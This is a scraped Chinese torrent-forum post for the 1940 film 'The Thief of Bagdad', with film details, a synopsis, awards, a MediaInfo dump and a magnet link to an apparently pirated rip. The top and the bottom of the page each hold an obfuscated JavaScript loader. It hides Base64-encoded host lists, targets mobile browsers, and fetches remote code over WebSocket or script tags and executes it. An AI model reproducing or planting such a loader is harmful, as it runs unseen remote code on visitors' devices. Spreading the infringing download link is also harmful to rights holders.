巴格达妙贼[中文字幕].The.Thief.of.Bagdad.1940.1080p.BluRay.x265.10bit.DTS 8.44GB

版主小s 1月前 316

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 巴格达妙贼 / 月宫宝盒 / 巴格达大盗 / 巴格达窃贼 / 巴格达的盗贼

◎片 名 The Thief of Bagdad

◎年 代 1940

◎产 地 英国

◎类 别 家庭 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 1958-05(中国大陆) / 1940-12-05(英国)

◎IMDb链接 https://www.imdb.com/title/tt0033152/

◎豆瓣评分 7.6/10 (1072人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293444/

◎片 长 106 分钟

◎导 演 路德维希·贝格尔 Ludwig Berger (id:1017043)

迈克尔·鲍威尔 Michael Powell (id:1027955)

蒂姆·威伦 Tim Whelan (id:1042285)

◎编 剧 迈尔斯·马勒森 Miles Malleson (id:1019263)

拉约什·比罗 Lajos Biró (id:1023801)

◎演 员 康拉德·韦特 Conrad Veidt (id:1007139)

琼·杜普雷 June Duprez (id:1079300)

约翰·贾斯廷 John Justin (id:1111646)

雷克斯·英格拉姆 Rex Ingram (id:1055504)

萨布 Sabu (id:1004991)

米克罗斯·罗兹萨 Miklós Rózsa (id:1002885)

◎标 签 英国 / 魔幻 / 1940 / 奇幻 / 神话 / 1940s / 英国电影 / CC

◎简 介

由密契尔·鲍威尔等三位导演联合执导的一部历久弥新的神话片。故事取材于阿拉伯神话,内容大致描述一个会妖术的奸相贾法,用阴谋诡计把巴格达城的阿麦王拘禁起来,然后自号为王。阿麦后来得到同牢的小神阿菩相助而逃走。贾法为了得到公主,把阿麦变成瞎子,并把阿菩变成一条狗。最后得巨人相助,终于射杀贾法,让阿麦重新成为巴格达城的国王。导演手法相当统一流畅,而且对光影的运用别有一手。此外,本片有很多建筑宏伟的布景和模型,运用起来都很恰当,交互剪接之后也没有什么明显的破绽。

◎获奖情况 (共4项)

第13届奥斯卡金像奖 (1941)

彩色片最佳摄影

└──乔治斯·佩里纳尔 (id:1276563)

最佳特效

彩色片最佳艺术指导

└──文森特·柯达 (id:1012785)

最佳原创配乐(提名)

└──米克罗斯·罗兹萨 (id:1002885)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 172367068369142937575637436590511731671 (0x81ACB09957F5418D670E1FDD2F85B3D7)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.44 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate : 11.4 Mb/s

  10. Movie name : Der Dieb von Bagdad

  11. Encoded date : UTC 2021-10-22 01:36:30

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 46 min

  23. Bit rate : 10.6 Mb/s

  24. Width : 1 474 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 4:3

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.276

  33. Stream size : 7.82 GiB (93%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1474x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4353 (0x1101)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 46 min

  45. Bit rate mode : Constant

  46. Bit rate : 768 kb/s

  47. Channel(s) : 1 channel

  48. Channel layout : C

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 583 MiB (7%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4609 (0x1201)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 44 min

  66. Bit rate : 33.0 kb/s

  67. Count of elements : 1844

  68. Stream size : 24.8 MiB (0%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4610 (0x1202)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 44 min

  82. Bit rate : 33.2 kb/s

  83. Count of elements : 1844

  84. Stream size : 24.9 MiB (0%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4611 (0x1203)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 44 min

  98. Bit rate : 18.8 kb/s

  99. Count of elements : 1844

  100. Stream size : 14.1 MiB (0%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4612 (0x1204)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 44 min

  114. Bit rate : 19.0 kb/s

  115. Count of elements : 1844

  116. Stream size : 14.3 MiB (0%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 45 min

  129. Bit rate : 27.6 kb/s

  130. Count of elements : 1898

  131. Stream size : 20.7 MiB (0%)

  132. Title : eng

  133. Language : English

  134. Default : No

  135. Forced : No


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:04:16.875 : en:Chapter 02

  139. 00:09:03.083 : en:Chapter 03

  140. 00:12:00.791 : en:Chapter 04

  141. 00:16:20.791 : en:Chapter 05

  142. 00:21:17.291 : en:Chapter 06

  143. 00:25:15.166 : en:Chapter 07

  144. 00:29:03.666 : en:Chapter 08

  145. 00:35:38.666 : en:Chapter 09

  146. 00:43:19.791 : en:Chapter 10

  147. 00:49:41.833 : en:Chapter 11

  148. 00:54:52.708 : en:Chapter 12

  149. 00:58:29.875 : en:Chapter 13

  150. 01:01:37.500 : en:Chapter 14

  151. 01:05:30.375 : en:Chapter 15

  152. 01:11:06.416 : en:Chapter 16

  153. 01:14:12.750 : en:Chapter 17

  154. 01:18:27.916 : en:Chapter 18

  155. 01:22:13.125 : en:Chapter 19

  156. 01:27:02.666 : en:Chapter 20

  157. 01:31:23.125 : en:Chapter 21

  158. 01:34:57.958 : en:Chapter 22

  159. 01:40:48.708 : en:Chapter 23

  160. 01:44:03.000 : en:Chapter 24


TAGS 奇幻 冒险 家庭

磁力链:
  • magnet:?xt=urn:btih:E6E6A5C25A3B4C41CC539404BC959FC6981A4C83

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};